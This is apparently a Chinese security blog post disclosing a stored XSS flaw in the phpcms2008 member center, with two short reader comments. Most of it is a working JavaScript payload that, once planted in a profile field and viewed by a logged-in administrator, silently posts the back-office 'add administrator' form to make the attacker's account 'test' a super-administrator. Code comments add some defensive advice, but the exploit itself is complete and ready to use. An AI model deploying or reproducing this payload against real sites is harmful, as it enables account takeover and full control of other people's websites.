phpcms2008会员中心某处xss

by 0day5_Saline

首先注册一个会员,然后到会员中心修改资料(任意一处均可),写入xss代码,再诱使管理员在后台点击触发。

[php]
/**
 * Builds the request object used by the rest of the script.
 *
 * Prefers the native XMLHttpRequest constructor. On browsers that only expose
 * ActiveXObject, every ProgID in the list is attempted in order and the LAST
 * one that instantiates is kept (there is no early exit). Failures are
 * swallowed on purpose so that an unavailable ProgID never aborts the script.
 *
 * @returns {Object|boolean} the request object, or false when neither
 *     mechanism is available.
 */
function ajax() {
  // Native implementation available: nothing else to probe.
  if (window.XMLHttpRequest) {
    return new XMLHttpRequest();
  }

  // No native constructor and no ActiveX either: report failure as false.
  if (!window.ActiveXObject) {
    return false;
  }

  // Legacy MSXML ProgIDs ('Microsoft.XMLHTTP' is listed twice in the original).
  var progIds = [
    'Microsoft.XMLHTTP',
    'MSXML.XMLHTTP',
    'Microsoft.XMLHTTP',
    'Msxml2.XMLHTTP.7.0',
    'Msxml2.XMLHTTP.6.0',
    'Msxml2.XMLHTTP.5.0',
    'Msxml2.XMLHTTP.4.0',
    'MSXML2.XMLHTTP.3.0',
    'MSXML2.XMLHTTP'
  ];

  var transport = false;
  progIds.forEach(function (progId) {
    try {
      transport = new ActiveXObject(progId);
    } catch (ignored) {
      // ProgID not registered on this machine; keep whatever we already have.
    }
  });
  return transport;
}
// One shared request object for the whole script; xhr_act() reads it as a global.
// ajax() can return false, and nothing here checks for that before it is used.
var _x = ajax();
// Invoked at evaluation time (adduser is a hoisted function declaration), so the
// request is issued as soon as the page carrying this script is rendered,
// without any further interaction from the viewer.
adduser();
/**
 * Submits the back-office "add administrator" form from the viewer's browser.
 *
 * The target is a relative URL (admin.php?mod=phpcms&file=admin&action=add),
 * so the request goes to the site the script is rendered on and is sent with
 * whatever session the viewing user holds there. The urlencoded body decodes
 * to: admin[username]=test, admin[alloweditpassword]=1, roleids[]=1,
 * admin[disabled]=0, plus a dosubmit field. Per the write-up, role 1 is the
 * super-administrator role and "test" is an account the author registered.
 *
 * NOTE(review): the body contains no anti-CSRF token and no current-password
 * field, so the endpoint presumably accepts the change on the session cookie
 * alone -- confirm against the admin handler. Defensive takeaways: HTML-encode
 * member-profile fields wherever the back office displays them, require a
 * per-session token (ideally re-authentication) for role changes, and alert
 * on unexpected admin-add requests or newly created role-1 accounts.
 */
function adduser() {
// src and data are assigned without var, so both become implicit globals.
src="admin.php?mod=phpcms&file=admin&action=add"; data="admin%5Busername%5D=test&admin%5Balloweditpassword%5D=1&roleids%5B%5D=1&admin%5Bdisabled%5D=0&dosubmit=+%C8%B7%B6%A8+";
// The return value (the response body) is discarded; success is not checked.
xhr_act("POST",src,data);
}

/**
 * Sends one request through the shared global _x and returns the response text.
 *
 * @param _m HTTP method passed to open().
 * @param _s URL passed to open().
 * @param _a Request body passed to send().
 * @returns the responseText of the completed request.
 */
function xhr_act(_m,_s,_a){
// Third argument false = synchronous request: send() blocks until the response arrives.
_x.open(_m,_s,false);
// Form encoding is declared only for POST; other methods go out without a Content-Type.
if(_m=="POST")_x.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
_x.send(_a);
// Status code is never inspected; the body is returned whatever the outcome.
return _x.responseText;
}[/php]
脚本在管理员已登录的后台会话中执行后,会自动把用户test提升为超级管理员

2 条评论

  1. sugen

    ... test 密码是多少

    1. 0day5
      @sugen

      test用户是自己注册的。给出的js代码只是把test提升为管理而已
